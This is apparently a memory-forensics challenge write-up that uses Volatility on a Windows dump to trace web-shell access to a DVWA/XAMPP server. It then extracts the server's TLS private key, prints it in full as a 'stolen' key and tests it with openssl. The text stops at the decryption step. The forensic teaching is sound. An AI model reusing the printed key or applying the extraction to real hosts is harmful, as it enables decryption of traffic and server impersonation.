File Modification Date/Time     : 2023:12:07 09:35:35-05:00
File Access Date/Time           : 2023:12:07 09:36:19-05:00
File Inode Change Date/Time     : 2023:12:07 09:35:35-05:00
File Permissions                : -rw-------
File Type                       : Win32 EXE
File Type Extension             : exe
MIME Type                       : application/octet-stream
Machine Type                    : Intel 386 or later, and compatibles
Time Stamp                      : 2023:05:19 23:12:28-04:00
Image File Characteristics      : Executable, 32-bit
PE Type                         : PE32
Linker Version                  : 14.29
Code Size                       : 279552
Initialized Data Size           : 76288
Uninitialized Data Size         : 0
Entry Point                     : 0x44663
OS Version                      : 6.0
Image Version                   : 0.0
Subsystem Version               : 6.0
Subsystem                       : Windows command line


Q: What does the first 128 bytes of this file contain and what does it confirm?
A: The first 128 bytes contains the following:
This confirms this is a Windows executable.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ xxd -len 128 ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000  MZ..............
00000010: b800 0000 0000 0000 4000 0000 0000 0000  ........@.......
00000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000030: 0000 0000 0000 0000 0000 0000 1801 0000  ................
00000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468  ........!..L.!Th
00000050: 6973 2070 726f 6772 616d 2063 616e 6e6f  is program canno
00000060: 7420 6265 2072 756e 2069 6e20 444f 5320  t be run in DOS
00000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000  mode....$.......

Looking at prefetch files:

Q: How many prefetch files were returned?
A: There were 45 Prefetch files returned

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep --perl-regexp "\.pf" | awk --field-separator=' ' '{ print $2 }' | sort --unique | wc --lines
45

Analyzing the prefetch files, allow us to understand the number of times a program was run, the time the program was executed, etc.

Extracting the certutil.exe file.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep certutil -i
0xe78bf6e6ba90  \Windows\System32\certutil.exe  216
0xe78bf6e6e7e0  \Windows\Prefetch\CERTUTIL.EXE-28F1E0C1.pf      216
0xe78bf7934500  \Windows\System32\en-US\certutil.exe.mui        216

Q: What is the sha256 hash of this certituil.exe file found via the filescan:
A: 
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ sha256sum certutil_dump/file.0xe78bf6e6ba90.0xe78bf7065d40.ImageSectionObject.certutil.exe.img
e886ee1a0f92803e4b884ff099d9bbc717fe3cc6cd86f719d52f132776226493  certutil_dump/file.0xe78bf6e6ba90.0xe78bf7065d40.ImageSectionObject.certutil.exe.img


We know from our earlier analysis, we have a HTTP server.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | grep http
0xe78bf3af4740  TCPv4   0.0.0.0 80      0.0.0.0 0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000
0xe78bf3af4740  TCPv6   ::      80      ::      0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000
0xe78bf3af5920  TCPv4   0.0.0.0 80      0.0.0.0 0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000
0xe78bf3af5ea0  TCPv4   0.0.0.0 443     0.0.0.0 0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000
0xe78bf3af5ea0  TCPv6   ::      443     ::      0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000
0xe78bf3af4060  TCPv4   0.0.0.0 443     0.0.0.0 0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000

Q: What port(s) is the HTTP server listening on?
A: 80 and 443

Q: Is the server listening on IPv4, IPv6, None or both?
A: Both

Q: What is the name of the HTTP process?
A: httpd.exe

Q: What is the process ID(s) associated with the http process?
A: 10008, 5088
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | grep httpd
10008   8100    httpd.exe       0xe78bf6fb6080  1       -       1       False   2023-11-16 23:26:15.000000      N/A     Disabled
5088    10008   httpd.exe       0xe78bf61b9080  156     -       1       False   2023-11-16 23:26:16.000000      N/A     Disabled

Still dealing with files. This time specifically files associated with HTTP. More specifically, the "access.log" file.

Q: How many entries of the "access.log" file was returned?
A: There were 5 files returned
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep "access.log"
0xe78bf4c62130  \xampp\apache\logs\access.log   216
0xe78bf6e72980  \xampp\apache\logs\access.log   216
0xe78bf6e72ca0  \xampp\apache\logs\access.log   216
0xe78bf6e75d10  \xampp\apache\logs\access.log   216
0xe78bf6e76800  \xampp\apache\logs\access.log   216

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep "access.log" | wc --lines
5

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir access_log


Extract the files from their memory address:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf4c62130
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0xe78bf4c62130  access.log      file.0xe78bf4c62130.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap  0xe78bf4c62130  access.log      file.0xe78bf4c62130.0xe78bf6564d20.SharedCacheMap.access.log.vacb

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e72980
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0xe78bf6e72980  access.log      file.0xe78bf6e72980.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap  0xe78bf6e72980  access.log      file.0xe78bf6e72980.0xe78bf6564d20.SharedCacheMap.access.log.vacb

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e72ca0
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0xe78bf6e72ca0  access.log      file.0xe78bf6e72ca0.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap  0xe78bf6e72ca0  access.log      file.0xe78bf6e72ca0.0xe78bf6564d20.SharedCacheMap.access.log.vacb

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e75d10
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0xe78bf6e75d10  access.log      file.0xe78bf6e75d10.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap  0xe78bf6e75d10  access.log      file.0xe78bf6e75d10.0xe78bf6564d20.SharedCacheMap.access.log.vacb

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e76800
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0xe78bf6e76800  access.log      file.0xe78bf6e76800.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap  0xe78bf6e76800  access.log      file.0xe78bf6e76800.0xe78bf6564d20.SharedCacheMap.access.log.vacb

Q: Upon dumping the memory address how many files are created?
A: 10 files were reported for the 5 memory addresses which were extracted:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ls
file.0xe78bf4c62130.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf4c62130.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e72980.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e72980.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e72ca0.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e72ca0.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e75d10.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e75d10.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e76800.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e76800.0xe78bf6c3fdf0.DataSectionObject.access.log.dat

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024/access_log]
└─$ ls | wc --lines
10

Now that we have the files, let's answer the following question.

Q: What is/are the IP address(es) and its/their count(s) for the IP(s) seen in all the "access.log" files?
A: 
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat access_log/* | sort --unique | awk --field-separator='-' '{ print $1 }' | sort | uniq --count
...
     57 10.0.0.1
     19 10.0.0.110


There is a device which seems to be accessing our webserver with a non-standard GUI based browser. 

Q: What is the IP of this host?
A: 10.0.0.110

Q: What is the HTTP Method/Verb used by this non GUI based browser tool?
A: "GET"

Q: What are the URLs accessed.
A: "/dvwa/vulnerabilities/exec/shell.php"

Q: What version of HTTP is in use?
A: HTTP/1.1

Q: What was/were the response code(s)
A: 200. 

Q: For the response code(s), is/are this/these server and client codes?
A: Both Client and server. Server is 200 successful, 404 is client side error.

Q: What is the size of the smallest size of the object/response returned to the requestor using this non-GUI based browser?
A: 29

Q: What is the size of the largest size of the object/response returned to the requestor using this non-GUI based browser?
A: 2888

Q: What is the name of the non-standard GUI based browser?
A: curl

Q: What version of this non-GUI browser was being used?
A: 8.4.0

Below we see a sample of these entries.

See below for the answer to all the questions.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat access_log/* | sort --unique | grep --color=always --text 'curl'
10.0.0.110 - - [16/Nov/2023:18:19:50 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:20:11 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:24:45 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:26:37 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:26:54 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:01 -0500] "GET /dvwa/vulnerabilities/exec/main.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:09 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:25 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:36:02 -0500] "GET /dvwa/hackable/uploads/shell.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:36:09 -0500] "GET /dvwa/hackable/upload/shell.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:37:32 -0500] "GET /dvwa/vulnerabilities/upload/shell.php HTTP/1.1" 200 29 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:41:22 -0500] "GET /dvwa/vulnerabilities/upload/shell.php HTTP/1.1" 200 2888 "-" "curl/8.4.0"

Q: When was the date of this version release and how many known vulnerabilities are associated with it?
A: Date of release was Oct 11, 2023 and there are 2 known vulnerabilities.
  # Version Date Vulns
252 8.4.0 Oct 11 2023 2

Wrapping this section up

Q: What is the name of the Web Application being used and the platform it is running on?
A: The answer is seen above DVWA.
   As for the platform, it is XAMPP, see below.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep dvwa
0xe78bf4c54e40  \xampp\htdocs\dvwa\dvwa\css\main.css    216
0xe78bf620d400  \xampp\htdocs\dvwa\config       216
0xe78bf620e530  \xampp\htdocs\dvwa\config       216
0xe78bf6aac8a0  \xampp\mysql\data\dvwa\db.opt   216
0xe78bf6ac6840  \xampp\htdocs\dvwa\vulnerabilities\exec\source\low.php  216
0xe78bf6e4fd40  \xampp\htdocs\dvwa\vulnerabilities\upload\index.php     216
0xe78bf6e5f100  \xampp\htdocs\dvwa\dvwa\includes\dvwaPage.inc.php       216
0xe78bf6e5f420  \xampp\htdocs\dvwa\config\config.inc.php        216
0xe78bf6e619a0  \xampp\htdocs\dvwa\index.php    216
0xe78bf6e635c0  \xampp\htdocs\dvwa\dvwa\js\dvwaPage.js  216
0xe78bf6e63d90  \xampp\htdocs\dvwa\dvwa\js\add_event_listeners.js       216
0xe78bf6e65b40  \xampp\htdocs\dvwa\favicon.ico  216
0xe78bf6e66c70  \xampp\mysql\data\dvwa\users.ibd        216
0xe78bf6e67da0  \xampp\htdocs\dvwa\dvwa\images\logo.png 216
0xe78bf6e680c0  \xampp\mysql\data\dvwa\guestbook.ibd    216
0xe78bf6e68a20  \xampp\htdocs\dvwa\vulnerabilities\upload\source\low.php        216
0xe78bf792b090  \xampp\htdocs\dvwa\vulnerabilities\exec\index.php       216

Let's learn a bit about the web server configuration, at the time of this host being compromised.

Create a directory to dump the HTTP contents.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir httpd_dump

Locate the memory address of the httpd.conf file

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep httpd.conf
0xe78bf6e61b30  \xampp\apache\conf\httpd.conf   216

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir httpd_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e61b30
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0xe78bf6e61b30  httpd.conf      file.0xe78bf6e61b30.0xe78bf66e0450.DataSectionObject.httpd.conf.dat

With the file extracted, let's ask some questions 

Q: What is the configured "ServerRoot" for the web server?
A: "C:/xampp/apache"

Q: What port is the server configured to listen on?
A: 80: 

Q: What is the "User" name the server is configured to run as?
A: daemon

Q: What is the "Group" name the server is configured to run as?
A: daemon

Q: What is the "ServerAdmin" email address
A:  postmaster@localhost

Q: What is the "ServerName"
A: ServerName localhost:80

Q: What is the path to the error log:
A: ErrorLog "logs/error.log"

Q: What is the current logging level configuration
A: LogLevel warn

Below shows the evidence for above:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --text --perl-regexp --ignore-case '^(ServerRoot|Listen|User|Group|ServerAdmin|ServerName|ErrorLog|LogLevel)' httpd_dump/file.0xe78bf6e61b30.0xe78bf66e0450.DataSectionObject.httpd.conf.dat
ServerRoot "C:/xampp/apache"
Listen 80
User daemon
Group daemon
ServerAdmin postmaster@localhost
ServerName localhost:80
ErrorLog "logs/error.log"
LogLevel warn


Let's attempt to steal the server's private key and its certificate. This way, we can decrypt any communication encrypted by this private key.
A similar compromised actually occurred at Microsoft Corp, where a signing key was stolen. 

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep --perl-regexp 'server\.key|server.crt'
0xe78bf79354a0  \xampp\apache\conf\ssl.crt\server.crt   216
0xe78bf7938510  \xampp\apache\conf\ssl.key\server.key   216

Create a directory to store the contents.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir ssl_dump

Grab the certificate first

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ssl_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf79354a0
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0xe78bf79354a0  server.crt      file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat

Confirm the certificate file

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ file ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat
ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat: PEM certificate

We see above is PEM (Privacy Enhanced Mail) file. These files may contain the public certificate or the entire SSL chain which may include the private and public keys, along with other information on root and intermediate certificates. Interesting start. This file is base64 encoded.

Confirming we were able to recover the first part.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat
-----BEGIN CERTIFICATE-----
MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
-----END CERTIFICATE-----

Well it looks like this only contains the public key certificate information. With this in place, time for some questions.

Q: What is the server "Certificate" "Serial Number"?
A: b5:c7:52:c9:87:81:b5:03

Q: What is the server "Certificate" "Validity" period:
A: Validity
            Not Before: Nov 10 23:48:47 2009 GMT
            Not After : Nov  8 23:48:47 2019 GMT
Q: What is the server "Certificate" "Subject"?
A: Subject: CN = localhost

Q: What "Public Key Algorithm" is used by the certificate?
A: Public Key Algorithm: rsaEncryption

Q: How many bits are used for the "Public-Key"
A: Public-Key: (1024 bit)

Q: What "Signature Algorithm" is used?
A: sha1WithRSAEncryption

Below provides the answer to these questions.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl x509 -in ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat -text -noout
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number:
            b5:c7:52:c9:87:81:b5:03
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: CN = localhost
        Validity
            Not Before: Nov 10 23:48:47 2009 GMT
            Not After : Nov  8 23:48:47 2019 GMT
        Subject: CN = localhost
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a:
                    75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5:
                    9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75:
                    bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a:
                    f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa:
                    f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3:
                    67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40:
                    97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e:
                    67:7a:28:c9:a4:34:ff:19:ed
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha1WithRSAEncryption
    Signature Value:
        6a:f1:f3:49:6c:f9:ba:68:5f:6f:f3:27:04:c6:b9:0c:bd:95:
        37:34:be:f7:08:66:9a:9b:03:18:41:be:b9:1d:24:33:55:b6:
        19:02:1d:54:71:c9:4f:21:5d:68:75:f3:81:52:41:41:c5:93:
        c2:1a:7c:e2:7b:c7:4a:24:13:0c:14:9a:4f:a7:10:35:0a:6f:
        6a:0f:d3:68:40:ff:48:44:29:9b:45:6a:0c:5c:29:7c:56:2e:
        b9:f0:4b:bd:53:5b:2e:42:b1:6c:ad:97:c1:4b:ee:d1:1c:68:
        2d:d0:4c:0b:ff:3d:1e:aa:d9:d2:9a:62:38:db:90:f9:7d:8c:
        b7:11


Time to grab the private key

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ssl_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf7938510
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0xe78bf7938510  server.key      file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ file ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat
ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat: PEM RSA private key


┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDBJdMn4+ytDYNqbedfmnUQI+KQnaBjlY8dQZpY1ZxjjFtzhpB5
zMPWo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDE
ayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQAB
AoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KK
gsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgk
nAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjd
Rq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8Ell5QxhSg7skrHSZ0cBPhyaLNDIZkn
3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmmcuMi2C9OwGI
rI+lx1Q8mK261NKJh7sSVwQikh5YQYLKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/
Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB7
72097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBW
Vm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9U
bjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs
-----END RSA PRIVATE KEY-----

This now proves that we have the private key. Peaking into the private key

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl rsa -in ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -noout -text | head --lines=10
Private-Key: (1024 bit, 2 primes)
modulus:
    00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a:
    75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5:
    9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75:
    bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a:
    f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa:
    f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3:
    67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40:
    97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e:
...


With the private and public key at hand. Here are your questions.
Q: Create and encrypt a file using the stolen key pair.
A: This is shown below.

Let's extract the public key from this file.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl rsa -in ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -pubout > mem_server_pub.pem
writing RSA key

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat mem_server_pub.pem
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDBJdMn4+ytDYNqbedfmnUQI+KQ
naBjlY8dQZpY1ZxjjFtzhpB5zMPWo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQ
IwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpru
U51jDmd6KMmkNP8Z7QIDAQAB
-----END PUBLIC KEY-----

Confirm it is the same as what we extracted above from the .pem file.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl rsa -in mem_server_pub.pem -pubin -text -noout
Public-Key: (1024 bit)
Modulus:
    00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a:
    75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5:
    9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75:
    bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a:
    f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa:
    f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3:
    67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40:
    97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e:
    67:7a:28:c9:a4:34:ff:19:ed
Exponent: 65537 (0x10001)

Looks good! We saw we could get the public key directly from memory or by extract it from the PEM file which contained both the private and public key information.

Let's create a file to show we can now encrypt and decrypt with this private and public key pair.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ echo "Welcome to Nik's Total Recall 2024 Memory Forensics Challenge" > stolen_private_key.txt

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat stolen_private_key.txt
Welcome to Nik's Total Recall 2024 Memory Forensics Challenge


Encrypting the file using the public key.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl pkeyutl -encrypt -inkey mem_server_pub.pem -pubin -in stolen_private_key.txt -out stolen_private_key.txt.enc

Verifying the encrypted data vs the unencrypted. Using xxd we see this communication is encrypted.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ xxd stolen_private_key.txt.enc
00000000: aafd f40c 5501 a1e7 c2d2 67c1 64a9 96bd  ....U.....g.d...
00000010: 218f 4455 3927 4d48 bd06 5b60 8e68 f872  !.DU9'MH..[`.h.r
00000020: d3f7 1e59 a58f 59ca 02cc 2cdc c9a6 1fc0  ...Y..Y...,.....
00000030: 83cc a903 cbbe b2ca 12be 24f2 450a c788  ..........$.E...
00000040: 2f7b 0502 1780 c944 18a3 857e 599e a9a2  /{.....D...~Y...
00000050: 7dd3 5a1c 3806 ce2d 32d0 4662 d246 feeb  }.Z.8..-2.Fb.F..
00000060: 1b87 254d 753c c681 97cb 4f4c cecb 9a43  ..%Mu<....OL...C
00000070: 67d8 7513 2fcd 39eb ad1d 1b00 b5a5 db91  g.u./.9.........

This is the before the file was encrypted.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ xxd stolen_private_key.txt
00000000: 5765 6c63 6f6d 6520 746f 204e 696b 2773  Welcome to Nik's
00000010: 2054 6f74 616c 2052 6563 616c 6c20 3230   Total Recall 20
00000020: 3234 204d 656d 6f72 7920 466f 7265 6e73  24 Memory Forens
00000030: 6963 7320 4368 616c 6c65 6e67 650a       ics Challenge.


We can see above, we use the public key to encrypt the communication. Let's now use the recovered server's private key to decrypt this encrypted communication.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
